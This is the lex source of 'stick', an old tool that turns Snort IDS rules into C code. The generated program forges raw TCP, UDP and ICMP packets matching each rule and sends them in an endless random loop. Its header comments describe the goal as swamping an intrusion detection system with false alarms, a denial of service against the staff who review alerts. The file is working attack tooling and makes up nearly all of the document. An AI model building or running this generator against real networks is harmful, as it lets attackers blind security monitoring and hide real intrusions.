%{
/* 
*
*  stick v1.0
*
*  Written by: Coretez Giovanni
*
*  Purpose:  Stick is an example of a threshold analysis tool. Although 
*  the tool is designed to be most effective evaluating the implementation
*  of a snort configuration, it can also stress other tools that performing
*  sniffing tasks.
*
*  Stick takes advantage of several weaknesses in IDS design.  The first is 
*  that many IDS (to include snort) are stateless in the analysis of data 
*  and allows the ability for a tool to trigger an enourmous amount of false
*  positives.  These generated false postive are difficult to analyze in a 
*  statelss mode, and therefore produce a resource denial-of-service, not on
*  the computer, but on the personnel that review it.
*
*  Although this DOS against the processes behind a bad IDS are exposed 
*  during an evaluation with "stick", other implementation and logic flaws
*  become appearent, all of these flaws can be taken advantage of by other
*  means than denial of service and resource exhaution.  
*
*  The side effects of this tool is a form of denial-of-service.  But, it can
*  send its packets at full speed and unless the rules are well crafted, will
*  not harm a system on the network unless it is performing sniffing activities.
*
*  But this is enough for inline documentation to explain purpose.
*  
*  please see the README file for installation and operation.
*/

#include <strings.h>

/*  The TARGETIP address is 10.0.0.5 and should be substituted before compiling */

#define GETLRANDOM	(getrandom (0, 65535) * getrandom (0, 65535))

#define ICMP 1
#define TCP  6
#define UDP 17

/*
*  It looks a little like C so far.  
*
*  This however is a lex program.  Short for lexicon analyzer.  It is 
*  normally accompanied by a yacc program (yet another compilier compilier).
*  But I'm being extremely lazy and don't feel like defining the language
*  correctly for a simple proof of concept.  What is happening here is that
*  I am reading in the snort rules as if they were actually a computer lanuage.
*  Hence the use of snort.  I'm using a simple pass technique to avoid yacc
*  and so predefining variables that in most cases would have a symbol table,
*  That's why the $VAR capability in snort is being ignored.
*  But the single pass will be.  Each rule creates a procedure that will
*  generate a packet that matches the same type of packet that would trigger
*  snort to alarm.  The collection of procedures compose a parallel language,
*  but there isn't a conveint one to use, so the headerfile.c takes uses a 
*  a sequential engine that randomly chooses a procedure to run. 
*/

int rulenumber = 0;
int sourcenow = 1;
int packettype = TCP;
int dummy = 0;
int is16 = 0;
char tempstr[16];


void convert_hex (char starter[])
/*
* Function:  Convert Hex
*
* This routine takes the hex string that is a mixture of 
* both ascii and hex and creates a single string in octal string
* represenation that the buffer will understand.  It doesn't return
* anything because all the lex programming is doing is actual creating 
* a program that we will compile.
*/
 {
   int fcount = 10;
   int counter = 1;
   int state = 0;
   int charval = 0;
   int getoct = 0;
   int onnumber = 0;
   

   while ((starter[counter] != 22) && (starter[counter+1] != 0))
   {
     if (state == 1) {
     /*
      *  If we are in state then we are converting data from ascii hex to ascii.
      */

      if (starter[counter] == '|') {
         printf ("\\%o",charval);
         state = 0;
         charval = 0;
         onnumber = 0;
         counter++;     
      }
      else if ((starter[counter] == 32) || (onnumber == 2)) {
         printf ("\\%o",charval);
         charval = 0;
         if (starter[counter] == 32)
           counter++; 
         onnumber = 0;
      }
      else {
         onnumber++;
         getoct = starter[counter++];
         if (getoct >= '0' && getoct <= '9')
            getoct = getoct - '0';
         if (getoct >= 'a' && getoct <= 'f')
            getoct = getoct - 87;
         if (getoct >= 'A' && getoct <= 'F')
            getoct = getoct - 55;
         charval = (charval * 16) + getoct;  
      }
     }
     else {
     /*
      * We are in a trivial copy state, but need to check if we are changing states.
      */
      if (starter[counter] == '|') {
         state = 1;
         charval = 0;
         counter++; 
      }
      else {
         printf ("\\%o",starter[counter++]);
      }
     }

   } 
}    

void print_header_variable ()
{
  switch (sourcenow) {
    case 1:
        switch (packettype) {
          case TCP: case UDP: case ICMP:
             printf("        ih->src = inet_addr(\"%s\");\n", yytext);
            break;
          default:
             printf("/*      Huston ... we have a problem here.i  */\n");
            break;
        }
      break;
    case 2:
        switch (packettype) {
          case TCP:
             printf("        th->src = endian16(%s);\n", yytext);
            break;
          case UDP:
             printf("        uh->src = endian16(%s);\n", yytext);
            break;
          case ICMP:
            break;
          default:
            break;
        }
      break;
    case 3:
        switch (packettype) {
          case TCP: case UDP: case ICMP:
	     printf("        ih->dst = destptr ();\n");
             printf("/*      Though this is a defined value by the rule, its not going into the target network. */\n");
            break;
          default:
             printf("/*      Huston ... we have a problem here.i  */\n");
            break;
        }
      break;
    case 4:
        switch (packettype) {
          case TCP:
             printf("        th->dst = endian16(%s);\n", yytext);
            break;
          case UDP:
             printf("        uh->dst = endian16(%s);\n", yytext);
            break;
          case ICMP:
            break;
          default:
            break;
        }
      break;
    deafult:
      /* We are clueless.... probably this is a RANGE token somewhere */
      break;
  }
  sourcenow++;
}

void print_header_static ()
{
  switch (sourcenow) {
    case 1:
        switch (packettype) {
          case TCP: case UDP: case ICMP:
	     printf("  	     ih->src = sourceptr ();\n");
            break;
          default:
             printf("/*      Huston ... we have a problem here.i  */\n");
            break;
        }
      break;
    case 2:
        switch (packettype) {
          case TCP:
	     printf("       th->src = getrandom(0,65535);\n"); 
            break;
          case UDP:
	     printf("       uh->src = getrandom(0,65535);\n");
            break;
          case ICMP:
            break;
          default:
            break;
        }
      break;
    case 3:
        switch (packettype) {
          case TCP: case UDP: case ICMP:
	      printf("	      ih->dst = destptr ();\n");
            break;
          default:
             printf("/*      Huston ... we have a problem here.i  */\n");
            break;
        }
      break;
    case 4:
        switch (packettype) {
          case TCP:
	     printf("	      th->dst = getrandom(0,65535);\n");
            break;
          case UDP:
	     printf("	      uh->dst = getrandom(0,65535);\n");
            break;
          case ICMP:
            break;
          default:
            break;
        }
      break;
    deafult:
      /* We are clueless.... probably this is a RANGE token somewhere */
      break;
  }
  sourcenow++;
}





%}

/*****************************************************************
What follows is in lex.  The left collum is the token that 
we are looking to create its code.  On the righthand side is 
C code that is writing (confusing enough) C code.   The
result of these lines produces functions that are uniquely numbered.

*****************************************************************/
%%
[\n\y ]	;

^[ ]*var.+	{/* DEFINING A VARIABLE printf("\nVARTYPE "); */}
^[ ]*preprocessor.+	;
^[ ]*pass.+	        ;

^[ ]*alert	{
           printf("\nvoid RULEPROC%d ()\n { \n",++rulenumber);
           sourcenow=1;
        }

"TCP"|"tcp"	{/* Create Global Variables for Packet Types */
		printf("	cleanTCP();\n");
		packettype =TCP;
        }
"ICMP"|"icmp"	{
		printf("	cleanICMP();\n");
		packettype =ICMP;
        }
"UDP"|"udp"	{
                printf("	cleanUDP();\n");
		packettype =UDP;
        }

any	{
                print_header_static ();
        }

HOME_NET	{
                   printf("void EXTERNAL() \n ");
                   printf("{ \n ");
                   printf("	 \n ");
                   printf("} \n ");
	        }


\$HOME_NET	{
                  print_header_static ();
		}

\!\$HOME_NET	{
                  print_header_static ();
		}


->		;
\<>		;

msg:[ ]*\"[^"]*\";	{printf ("       /* printf (\"Sending rule: %s \\n\");i */ \n", yytext);}
content:	{printf("	");}
flags:		;
depth:		{printf("	dummy =");}
nocase:		;
dsize:		{printf("	dummy = ");
		/* dsize to be implemented later */}
itype:		{printf("	icmph->itype = ");}
icode:		{printf("	icmph->icode = ");}
icmp_id:	{printf("	icmph->id = ");
                 is16 = 1;}
icmp_seq:	{printf("	icmph->seq = ");
                 is16 = 1;}
ack:		{printf("	th->ackseq = ");}
seq:		{printf("	th->seq= ");}
ttl:		{printf("	ih->ttl= ");}
offset:		{printf("	ih->off= ");}



\"[^"].*\"		{
                 /* Cannot just copy the string ... need to convert */
                 /* it to handle the | operator for hex.            */
                 /*                                                 */
                 /* So ... no more ....                             */
                 /* printf("(dh,%s); \n", yytext);                  */
                 printf (" strcpy (dh,\"");
                 convert_hex (yytext);
                 printf ("\");\n");
  
                 /* Adding some extra length to the total IP length */
                 printf("       ih->tl=%d;\n",180);
                         }
[0-9]+;		{
                 if (is16)
                     { /* need to truncate yytext by one */
                       strcpy(tempstr, yytext);
                       tempstr[strlen(tempstr)-1] = 0;
                       printf(" endian16(%s); \n ", tempstr);
                       is16 = 0;
                     }
                 else 
                     { printf("%s \n ", yytext);
                     }
                }
A		{printf("	th->ack = 1;\n ");}
S		{printf("	th->syn = 1;\n ");}
F		{printf("	th->fin = 1;\n ");}
U		{printf("	th->urg = 1;\n ");}
P		{printf("	th->psh = 1;\n ");}
;		;


[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+	{
                print_header_variable ();
		}

[0-9]+		{
                print_header_variable();
		}

:		{printf("/*    RANGE TOKEN SEEN    */\n ");
                 /* RANGE GOES HERE */ }

\(		;
\)		{    printf("\n printf (\" sending rule %d \\n\");\n",rulenumber); 
                      
                     if (packettype==TCP)
                         printf ("th->sum = ip_sum ((u16 *) packet, (sizeof (struct new_ip) + sizeof (struct tcp) + 1) & ~1);\n");
                     printf("sendpacket ();\n");
                     printf("\n } \n ");
                 }

!		{}

\/[0-9]+	{/*
                  printf("	Netmask of %s\n",yytext);
                 */}

^#.*	;
.	;
%%
/*****************************************************************
This is the section of lex that operates like a giant input loop.
This is done in the yylex command.  When it is done we will know
how many procedures we have.  Each procedure is names RULEPROCxxxx
where xxxx is a number.  So the create function array procedure
writes a function that writes a C function.  This unique procedure
assigns an array of pointers were each pointer points to a function.
Later we can control the random execution by calling a random
pointer to a function that will generate a rule and send it off.
If we had a parellel system we could do this concurrently allowing 
the assurance of keeping the processes and mostly the network buffer
busy.
*****************************************************************/
void create_function_array ()
{
   int i;
   printf ("\n void init_functions() \n { \n");
   for (i=1;i<=rulenumber;i++)
                  printf("	funcpnt[%d] = RULEPROC%d;  \n ", 
                    i, i);

   printf("     ih = (struct new_ip *) packet;\n");
   printf("     th = (struct tcp *) (packet + sizeof (struct ip));\n");
   printf("     uh = (struct udp *) (packet + sizeof (struct ip));\n");
   printf("     icmph = (struct new_icmp *) (packet + sizeof (struct ip));\n");
   printf("     dh = (char *) (packet + sizeof (struct ip) + sizeof (struct tcp))+20;\n");
   /* printf("     dh = (char *) (packet + sizeof (struct ip) + sizeof (struct tcp));\n"); */

   printf ("\n}\n\n");

   printf ("\nint main (int argc, char * argv[])\n {\n");
   printf ("\n   init_functions();\n");
   printf ("\n   init_arguments(argc, argv);\n");
   printf ("  while (1) {\n");   
   printf ("     funcpnt[getrandom(1,%d)]();\n   }\n}\n",
            rulenumber);
}

main (argc, argv)
{
	yylex();
        create_function_array();
}

